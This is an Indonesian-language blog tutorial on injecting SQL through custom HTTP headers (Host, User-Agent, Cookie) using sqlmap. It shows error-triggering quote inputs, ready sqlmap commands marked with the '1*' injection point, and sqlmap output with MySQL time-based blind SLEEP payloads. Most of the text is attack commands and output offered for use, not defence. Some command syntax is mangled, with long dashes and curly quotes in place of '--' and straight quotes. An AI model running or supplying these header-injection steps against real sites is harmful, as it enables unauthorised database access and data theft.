Custom HTTP Header Injection With Sqlmap


HTTP Header adalah pasangan nama atau nilai yang ditampilkan dalam pesan permintaan dan respons dari header pesan untuk Hypertext Transfer Protocol (HTTP). Biasanya, nama header dan nilainya dipisahkan oleh tanda titik dua. Header HTTP adalah bagian integral dari permintaan dan respons HTTP. Dalam istilah yang lebih sederhana, header HTTP adalah kode yang mentransfer data antara server Web dan browser. Header HTTP terutama ditujukan untuk komunikasi antara server dan klien di kedua arah.

SQL injection adalah jenis aksi hacking pada keamanan komputer di mana seorang penyerang bisa mendapatkan akses ke basis data di dalam sistem dengan sintak2 SQL.

Dibawah ini yang termasuk vuln terhadap SQL Injection

1. Header Host Injection Dengan Sqlmap

GET /index.php HTTP/1.1
Host: 192.168.1.8:8080
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:10.0) Gecko/20100101 Firefox/10.0'
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-gb,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.8:8080/index.php
Cookie: security=impossible; security=impossible; 
Cara Inject custom HTTP Header nya dengan command seperti berikut 

Host: 192.168.1.8:8080' =>> error

root@nubychan:~# python sqlmap.py -u site.com — header=”Host: 1*”
Parameter: Host #1* ((custom) HEADER)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: 1' OR 3 AND SLEEP(5) — GAYV21=6 AND 000953=000953 — 
Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
2. Header User-Agent Injection Dengan Sqlmap

User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:10.0) Gecko/20100101 Firefox/10.0' ==> Error
Cara Inject User-Agent nya dengan command seperti berikut 

root@nubychan:~# python sqlmap.py -u site.com — header=”User-Agent: 1*”
Parameter: User-Agent #1* ((custom) HEADER)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: 1' OR 3 AND SLEEP(5) — GAYV21=6 AND 000953=000953 — 
Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
3. Header Cookie Injection

Cookie: security=impossible; security=impossible; PHPSESSID=cut7n8ujh83pie6ib5dl2304k0 ==> no error
Cookie: 1' ==> error



Cara Inject Header Cookie nya dengan command seperti berikut 

root@nubychan:~# python sqlmap.py -u site.com — header=”Cookie: 1*”
Parameter: Cookie #1* ((custom) HEADER)
 Type: AND/OR time-based blind
 Title: MySQL >= 5.0.12 AND time-based blind
 Payload: 1' OR 3 AND SLEEP(5) — GAYV21=6 AND 000953=000953 — 
 Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
Thx to Doraemon v1.5 & z3r00_c00d3r

Eat, Sleep, Coding. Repeat !

Post a Comment